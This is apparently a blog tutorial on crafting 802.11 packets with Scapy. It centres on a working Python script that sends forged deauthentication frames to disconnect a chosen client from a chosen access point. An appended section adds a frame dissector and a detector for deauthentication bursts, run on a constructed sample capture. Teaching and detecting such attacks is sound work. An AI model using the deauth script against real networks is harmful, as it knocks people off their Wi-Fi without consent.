802.11 Protocol - Python Scripting

Introduction

In the previous blog post we began diving into the wonderful world of the 802.11 protocol. 802.11 is the IEEE standard that defines the media access control (MAC) and physical layer specifications for implementing wireless LAN access, what is most commonly known as wireless technology. In this blog post we will be looking at using a popular Python module named Scapy to manipulate, craft, and send 802.11 packets over the air.

There are some prerequisites if you plan on following along with this blog post and trying some of the code written here. The code should work on most Debian-based Linux systems. I will be using Kali Linux for my testing since I use that most days. Additionally, you will need Python and the Scapy module. You can install the Scapy module using a Python package installer such as pip or easy_install. Finally, you will need a wireless interface card that supports monitor mode. You can find instructions on

Scapy

Scapy is a powerful Python-based interactive packet manipulation program and library.  It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, store or read them using pcap files, match requests and replies, and much more. It is designed to allow fast packet prototyping by using default values that work.

Management Frame

Python Deauthentication Packet

#!/usr/bin/env python3

from scapy.all import *
import sys

def deauth(iface, bssid, client, count):
   # type=0, subtype=12 is a management frame of subtype deauthentication.
   # addr1 is the receiver (the client), addr2 the transmitter and addr3 the BSSID;
   # reason 7 is "class 3 frame received from nonassociated station".
   packet = RadioTap()/Dot11(type=0, subtype=12, addr1=client, addr2=bssid, addr3=bssid)/Dot11Deauth(reason=7)
   for n in range(int(count)):
      sendp(packet, iface=iface)
      print('Deauth sent via: ' + iface + ' to BSSID: ' + bssid + ' for Client: ' + client)


if __name__ == "__main__":
   if len(sys.argv) != 5:
      print('Usage is - ./deauth.py interface bssid client count')
      print('Example - ./deauth.py wlan0mon 00:11:22:33:44:55 55:44:33:22:11:00 4')
      sys.exit(1)

   # The interface that you want to send packets out of (monitor mode)
   conf.iface = sys.argv[1]
   # The BSSID of the Wireless Access Point you want to target
   bssid = sys.argv[2]
   # The MAC address of the Client you want to kick off the Access Point
   client = sys.argv[3]
   # The number of deauth packets you want to send
   count = sys.argv[4]
   # Used to suppress Scapy's per-packet output
   conf.verb = 0

   # Run the deauth function
   deauth(conf.iface, bssid, client, count)

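As an added example that is not part of the original post: the script above stacks RadioTap/Dot11/Dot11Deauth and lets Scapy fill in the bytes, so it is worth seeing what the resulting management frame header looks like on the wire, and what the receiving side (a wireless IDS, for instance) would do with it. The block below is a pure-Python dissector for the fixed 802.11 MAC header (no Scapy needed, so it runs offline), plus a detector that flags a BSSID sending a burst of deauthentication or disassociation frames inside a short window. The capture it works on is constructed inline from the MAC addresses used in the usage example; the function names, threshold and window are my own choices, not anything from the post.

```python
"""Dissect 802.11 management frames and flag deauthentication bursts.

Pure Python, no Scapy dependency. SAMPLE_CAPTURE is constructed below,
not a real capture.
"""
import struct
from collections import defaultdict

# Management frame (type 0) subtypes used here
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12


def mac_str(raw):
    """Render six raw bytes as a colon-separated MAC address."""
    return ":".join("%02x" % b for b in raw)


def mac_bytes(text):
    """Inverse of mac_str."""
    return bytes(int(x, 16) for x in text.split(":"))


def parse_dot11(frame):
    """Dissect the fixed 802.11 MAC header of a management frame.

    Layout (little-endian): frame control (2), duration/ID (2),
    addr1 (6), addr2 (6), addr3 (6), sequence control (2), body.
    For deauth/disassoc the body starts with a 2-byte reason code.
    """
    if len(frame) < 24:
        raise ValueError("frame too short for an 802.11 MAC header")
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x3      # 0 = management, 1 = control, 2 = data
    subtype = (fc0 >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "flags": fc1,
        "addr1": mac_str(frame[4:10]),    # receiver (the client for a deauth)
        "addr2": mac_str(frame[10:16]),   # transmitter (claimed BSSID)
        "addr3": mac_str(frame[16:22]),   # BSSID
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "reason": None,
    }
    if ftype == 0 and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_bursts(frames, threshold=5, window=1.0):
    """Return {bssid: peak_count} for BSSIDs that sent at least `threshold`
    deauth/disassoc frames within any `window` seconds.

    `frames` is an iterable of (timestamp, raw_frame_bytes). Hypothetical
    thresholds; a real IDS would tune them per environment.
    """
    seen = defaultdict(list)
    for ts, raw in frames:
        info = parse_dot11(raw)
        if info["type"] == 0 and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            seen[info["addr3"]].append(ts)
    flagged = {}
    for bssid, times in seen.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[bssid] = max(flagged.get(bssid, 0), count)
    return flagged


def _sample_mgmt_frame(subtype, addr1, addr2, addr3, seq, body=b""):
    """Build a bare management frame for the constructed sample only."""
    fc0 = (subtype << 4) | (0 << 2) | 0   # type 0 = management, version 0
    header = (struct.pack("<BBH", fc0, 0, 0) + mac_bytes(addr1) + mac_bytes(addr2)
              + mac_bytes(addr3) + struct.pack("<H", seq << 4))
    return header + body


# Constructed sample: one beacon, a burst of eight deauths (reason 7) in
# 0.7 s, then one isolated deauth (reason 3) much later. Addresses are the
# ones from the usage example above.
AP = "00:11:22:33:44:55"
CLIENT = "55:44:33:22:11:00"
BROADCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE_CAPTURE = (
    [(0.0, _sample_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP, 1))]
    + [(0.1 * i, _sample_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, 100 + i,
                                    struct.pack("<H", 7))) for i in range(8)]
    + [(5.0, _sample_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, 200, struct.pack("<H", 3)))]
)

if __name__ == "__main__":
    for ts, raw in SAMPLE_CAPTURE:
        print("%.1f %s" % (ts, parse_dot11(raw)))
    print("bursts:", detect_deauth_bursts(SAMPLE_CAPTURE))
```

The detector keys on addr3 (the BSSID) rather than addr2 because that is what a spoofed frame has to get right to be honoured by the client; a count far above what a legitimate AP would ever send in one second is the usual first-pass signal, and comparing it against the AP's own sequence-number progression is the natural next check.
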
Data Frame and Control Frame coming later.